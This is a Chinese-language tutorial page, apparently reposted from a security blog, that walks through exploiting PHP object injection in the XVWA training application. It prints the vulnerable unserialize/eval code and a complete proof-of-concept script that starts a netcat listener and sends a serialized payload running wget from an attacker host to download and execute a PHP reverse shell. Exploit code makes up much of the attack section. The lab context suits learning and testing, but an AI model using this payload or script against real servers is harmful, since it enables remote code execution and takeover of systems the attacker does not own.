编程 PHP

PHP序列化/对象注入漏洞分析

Posted in PHP onApril 18, 2016

本文是关于PHP序列化/对象注入漏洞分析的短篇，里面讲述了如何获取主机的远程shell。

如果你想自行测试这个漏洞，你可以通过 XVWA 和 Kevgir 进行操作。

漏洞利用的第一步，我们开始测试目标应用是否存在PHP序列化。为了辅助测试，我们使用了Burpsuite的SuperSerial插件，下载地址在这里。它会被动检测PHP和Java序列化的存在。

分析
我们检测到了应用里使用了PHP序列化，所以我们可以开始确认应用代码里是否含有远程代码执行漏洞。需要注意的是，序列化对象是从参数“r”取来的：

$var1=unserialize($_REQUEST['r']);
然后再进行反序列化和eval：

eval($this->inject);
接着，执行：

echo "<br/>".$var1[0]." - ".$var1[1];
有了这些，如果我们绕过了参数r的PHP序列化对象，那么就可以获得代码执行漏洞了！

< ?php 
  error_reporting(E_ALL);
  class PHPObjectInjection{
    public $inject;
 
    function __construct(){
 
    }
 
    function __wakeup(){
      if(isset($this->inject)){
        eval($this->inject);
      }
    }
  }
//?r=a:2:{i:0;s:4:"XVWA";i:1;s:33:"XtremeVulnerable Web Application";}
  if(isset($_REQUEST['r'])){ 
 
    $var1=unserialize($_REQUEST['r']);
    
 
    if(is_array($var1)){ 
      echo "
".$var1[0]." - ".$var1[1];
    }
  }else{
    echo "parameter is missing";
  }
? >

漏洞利用
为了利用这个漏洞，我们创建了一个简单的PHP脚本来自动生成PHP序列化payload，以及在目标远程主机上运行我们想要的命令。然后，我创建了一个通用的PHP反弹shell，下载地址如下：

http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
注意：你需要把这个文件传到web服务器上，改动反弹shell脚本里面的本地ip和端口，以及下面的利用代码：

<?php 
/*
PHP Object Injection PoC Exploit by 1N3@CrowdShield - https://crowdshield.com
A simple PoC to exploit PHP ObjectInjections flaws and gain remote shell access. 
Shouts to @jstnkndy @yappare for theassist!
NOTE: This requireshttp://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gzsetup on a remote host with a connect back IP configured
*/
print"==============================================================================\r\n";
print "PHP Object Injection PoCExploit by 1N3 @CrowdShield - https://crowdshield.com\r\n";
print"==============================================================================\r\n";
print "[+] Generating serializedpayload...[OK]\r\n";
print "[+] Launching reverselistener...[OK]\r\n";
system('gnome-terminal -x sh -c \'nc -lvvp1234\'');
class PHPObjectInjection
{
  //CHANGE URL/FILENAME TO MATCH YOUR SETUP
 public $inject = "system('wget http://yourhost/phpobjbackdoor.txt-O phpobjbackdoor.php && php phpobjbackdoor.php');";
}
 
$url ='http://targeturl/xvwa/vulnerabilities/php_object_injection/?r='; // CHANGE TOTARGET URL/PARAMETER
$url = $url . urlencode(serialize(newPHPObjectInjection));
print "[+] Sendingexploit...[OK]\r\n";
print "[+] Dropping down tointeractive shell...[OK]\r\n";
print"==============================================================================\r\n";
$response =file_get_contents("$url");
 
? >

Demo
现在咱们的利用脚本已经就绪，我们可以执行它来得到远程主机上的反弹shell，用来远程执行命令！

以上就是本文的全部内容，希望对大家学习php程序设计有所帮助。

PHP序列化/对象注入漏洞分析

- Author -

lijiao

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

PHP 相关文章推荐

用PHP实现文件上传二法

Oct 09 PHP

黑夜路人出的几道php笔试题

Aug 04 PHP

PHP 替换模板变量实现步骤

Aug 24 PHP

php while循环得到循环次数

Oct 26 PHP

phpphp图片采集后按原路径保存图片示例

Feb 18 PHP

体育彩票排列三组选三算法分享

Mar 07 PHP

Yii框架中memcache用法实例

Dec 03 PHP

php导入excel文件到mysql数据库的方法

Jan 14 PHP

Yii中的cookie的发送和读取

Jul 27 PHP

thinkphp实现把数据库中的列的值存到下拉框中的方法

Jan 20 PHP

php用wangeditor3实现图片上传功能

Aug 22 PHP

自定义Laravel (monolog)日志位置,并增加请求ID的实现

Oct 17 PHP

php实现三级级联下拉框

Apr 17 #PHP

PHP加密3DES报错 Call to undefined function: mcrypt_module_open() 如何解决

Apr 17 #PHP

orm获取关联表里的属性值

Apr 17 #PHP

ThinkPHP框架搭建及常见问题（XAMPP安装失败、Apache/MySQL启动失败）

Apr 15 #PHP

php基于jquery的ajax技术传递json数据简单实例

Apr 15 #PHP

PHP6连接SQLServer2005的三部曲

Apr 15 #PHP

php使用pear_smtp发送邮件

Apr 15 #PHP

You might like

PHP+MySQL投票系统的设计和实现分享

2012/09/23 PHP

PHP CURL或file_get_contents获取网页标题的代码及两者效率的稳定性问题

2015/11/30 PHP

Iframe 自适应高度并实时监控高度变化的js代码

2009/10/30 Javascript

js为空或不是对象问题的快速解决方法

2013/12/11 Javascript

JavaScript代码编写中各种各样的坑和填坑方法

2014/06/06 Javascript

使用jquery实现仿百度自动补全特效

2015/07/23 Javascript

jquery中validate与form插件提交的方式小结

2016/03/26 Javascript

AngularJS使用ng-repeat指令实现下拉框

2016/08/23 Javascript

AngularJs bootstrap搭载前台框架——准备工作

2016/09/01 Javascript

Boostrap实现的登录界面实例代码

2016/10/09 Javascript

JS命令模式例子之菜单程序

2016/10/10 Javascript

JavaScript中in和hasOwnProperty区别详解

2017/08/04 Javascript

详解React开发必不可少的eslint配置

2018/02/05 Javascript

LayUI表格批量删除方法

2018/08/15 Javascript

JavaScript实现的开关灯泡点击切换特效示例

2019/07/08 Javascript

taro小程序添加骨架屏的实现代码

2019/11/15 Javascript

jQuery实现移动端图片上传预览组件的方法分析

2020/05/01 jQuery

vantUI 获得piker选中值的自定义ID操作

2020/11/04 Javascript

[00:32]DOTA2上海特级锦标赛 Ehome战队宣传片

2016/03/03 DOTA

python实现颜色空间转换程序(Tkinter)

2015/12/31 Python

Django 忘记管理员或忘记管理员密码重设登录密码的方法

2018/05/30 Python

Python django框架应用中实现获取访问者ip地址示例

2019/05/17 Python

100行Python代码实现每天不同时间段定时给女友发消息

2019/09/27 Python

django实现web接口 python3模拟Post请求方式

2019/11/19 Python

python 录制系统声音的示例

2020/12/21 Python

英国创新设计文具、卡片和礼品包装网站：Paperchase

2018/07/14 全球购物

若通过ObjectOutputStream向一个文件中多次以追加方式写入object，为什么用ObjectInputStream读取这些object时会产生StreamCorruptedException？

2016/10/17 面试题

北大青鸟学生求职信

2013/09/24 职场文书

体育老师的教学自我评价分享

2013/11/19 职场文书

好人好事事迹材料

2014/02/12 职场文书

成龙霸王洗发水广告词

2014/03/14 职场文书

毕业论文致谢格式模板

2015/05/14 职场文书

小王子读书笔记

2015/06/29 职场文书

行政处罚听证告知书

2015/07/01 职场文书

幼儿教师师德培训心得体会

2016/01/09 职场文书

python+opencv实现目标跟踪过程

2022/06/21 Python